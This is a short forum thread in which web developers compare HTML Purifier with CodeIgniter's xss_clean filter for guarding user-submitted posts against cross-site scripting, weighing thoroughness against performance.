Are you sure about handling SECURITY?!

Hi again,

HTML Purifier: (The apple)

HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.

http://htmlpurifier.org/

XSS_clean: (The pear)

CodeIgniter comes with a Cross Site Scripting prevention filter, which looks for commonly used techniques to trigger JavaScript or other types of code that attempt to hijack cookies or do other malicious things. If anything disallowed is encountered it is rendered safe by converting the data to character entities.

http://www.codeigniter.com/user_guide/li...-filtering

Using HTML purifier when you are not cleaning HTML input is like using a laser precision micro digital measuring device to find out if you need a haircut :-)

HTML Purifier does some very clever stuff, but in so doing it is a resource heavy and relatively time consuming operation. I do not think anyone would propose using it on a name field for a form.

Hope that helps,

Paul.

Greeting to you..

You mean using HTML Purifier or XSS_Clean is a trade off, right? first are better, but it is third party, and doing operation while it is time consuming.

about xss_clean and "If anything disallowed is encountered it is rendered safe by converting the data to character entities." when I test it, as I said before, if there was a <script> element in the filed (a post), it do not print it like &lt;script&gt;, instead print [removed]!

I do not think anyone would propose using it on a name field for a form.

My main problem is about posts that will shown to user and is full of tags, not a name field. As @mwhitney mentioned and said to a  user, we could not rely on database data and it is untrusted.

thanks a lot.